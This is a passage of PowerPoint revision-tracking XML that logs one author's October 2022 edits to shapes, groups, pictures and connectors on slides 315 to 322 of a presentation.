          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:19.240" v="866" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="42" creationId="{24722287-8985-02D1-FAF5-15B984815B22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:15.335" v="865" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="3" creationId="{2D81E01E-F5A0-B96F-964B-27B9B8354C07}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:19.240" v="866" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="6" creationId="{54FE4583-C7DD-3214-2BEA-D4380CC8B9E6}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:24.010" v="867" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="9" creationId="{B93B58FC-D94A-28C5-14CB-FC49483DE914}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:29.435" v="868" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="12" creationId="{48B90474-49EC-61BC-D264-F9D2F2D6D5E1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:35.936" v="869" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="13" creationId="{7BB47018-52CB-A3E3-A5F5-4EA4438B1D45}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:41.248" v="870" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:grpSpMk id="14" creationId="{0F3AB029-7D6E-D2D0-CA3A-A2BDC1679ADE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:35.936" v="869" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="5" creationId="{18B41013-2559-FFDA-7916-6E24FFDC4132}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:24.010" v="867" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="7" creationId="{6B192823-6A69-0A72-DB96-8E50FB89D450}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:29.435" v="868" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="11" creationId="{4D931E3A-CA96-0700-7DEA-5FB2E2BFA7BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:41.248" v="870" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="15" creationId="{C4CD3F83-F921-C658-FEBE-35240BF6DAD5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:34:18.231" v="656" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3319556500" sldId="316"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:27.766" v="664"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="521767544" sldId="317"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:27:22.221" v="61" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317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5:34:43.451" v="660" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C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27" creationId="{1B3D4C9E-9A7A-6B5F-0546-4207640E2BC3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28" creationId="{FA40D98B-B3DF-2D97-D0BB-49D2F3C938E5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30" creationId="{E3F4925A-1875-5BB1-764B-70CEAA031F90}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:18.538" v="633" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:spMk id="31" creationId="{697AB0A9-7F95-A9C4-E59F-19253F09BA9F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32" creationId="{4BBDDDFE-9B6F-AF61-030D-4AFC2EFA1335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33" creationId="{42DDAD3C-8633-23BB-BB28-96DF590534AF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34" creationId="{AB6D0CDD-C03C-55AA-FBD8-E0E18F33A826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:spMk id="35" creationId="{9253F4B4-16DA-ACCB-3949-C9530FC6AE55}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:31:19.527" v="350" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:grpSpMk id="5" creationId="{BF50D918-EF5A-2C1A-28B4-7E81D667330D}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:grpSpMk id="36" creationId="{1648D779-A7BF-3B1D-CF03-5097AC54B0E8}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:picMk id="23" creationId="{46C15F23-945B-10B7-7551-93FA49561532}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:picMk id="25" creationId="{C9C08EDE-64F1-BCEA-E751-8242B392187D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:cxnSpMk id="26" creationId="{217EE613-E0D1-01CD-6D13-D3AE7F0F3435}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:35:24.373" v="663" actId="164"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521767544" sldId="317"/>
            <ac:cxnSpMk id="29" creationId="{62DC66DE-A99D-E371-C9F9-6CCA32D75310}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add ord">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:36:23.681" v="696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="47875490" sldId="318"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:28:41.852" v="194"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2885035684" sldId="318"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:53:40.565" v="1651" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2033038837" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:50:39.744" v="1421" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2033038837" sldId="319"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:01:19.577" v="2252" actId="114"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2972873864" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:00:06.737" v="2055" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2972873864" sldId="320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6:01:19.577" v="2252" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2972873864" sldId="320"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:53:08.074" v="1583" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2265329182" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:35.469" v="1574" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="11" creationId="{5D154DA5-B1F6-0A92-BCD3-EDD60EF90B6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="20" creationId="{A4FE9782-F360-FFA9-3339-9481E3D7471A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="22" creationId="{BDF7DEFA-489F-BE82-51BF-2D8A0BAE1509}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="29" creationId="{C2EB6F10-97AC-920C-886B-9774103B8521}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:spMk id="30" creationId="{3EC7B702-B3A3-CFD8-4961-DF0D6938ECB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:picMk id="9" creationId="{C61E203A-2298-4446-AF4E-32F60865CB08}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:picMk id="19" creationId="{441A42DD-43DA-EDC7-E081-2EE981D4B523}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:picMk id="21" creationId="{B3DFC6E5-96C5-BD39-07FC-2F27D957F549}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:picMk id="1026" creationId="{2002734A-933A-7F5B-C7B6-7D0FFCA73255}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:53:08.074" v="1583" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:picMk id="3074" creationId="{75FC25C8-0042-2C73-D952-7F8ABABCB9EE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:cxnSpMk id="10" creationId="{D125AF68-D19A-AD72-C292-1F4B252B2FC4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:38.839" v="1575" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2265329182" sldId="321"/>
            <ac:cxnSpMk id="26" creationId="{BCA99B30-807D-5775-A541-5378634D0320}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:59:50.326" v="2021" actId="688"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3116892378" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:58:26.398" v="1953" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322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5:57:58.213" v="1896" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="11" creationId="{5D154DA5-B1F6-0A92-BCD3-EDD60EF90B6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:59:50.326" v="2021" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="18" creationId="{05FBA815-61B5-7680-9000-58E89437DD24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="20" creationId="{A4FE9782-F360-FFA9-3339-9481E3D7471A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="22" creationId="{BDF7DEFA-489F-BE82-51BF-2D8A0BAE1509}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:54:10.847" v="1663" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="29" creationId="{C2EB6F10-97AC-920C-886B-9774103B8521}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:58:40.480" v="1966" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:spMk id="30" creationId="{3EC7B702-B3A3-CFD8-4961-DF0D6938ECB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:picMk id="9" creationId="{C61E203A-2298-4446-AF4E-32F60865CB08}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:picMk id="19" creationId="{441A42DD-43DA-EDC7-E081-2EE981D4B523}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:picMk id="21" creationId="{B3DFC6E5-96C5-BD39-07FC-2F27D957F549}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:55:02.004" v="1696" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:picMk id="1026" creationId="{2002734A-933A-7F5B-C7B6-7D0FFCA73255}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:59:04.393" v="1970" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:picMk id="5122" creationId="{D343768D-5F88-00DF-0C75-8DCC7FB61846}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
            <ac:cxnSpMk id="10" creationId="{D125AF68-D19A-AD72-C292-1F4B252B2FC4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:57:58.213" v="1896" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3116892378" sldId="322"/>
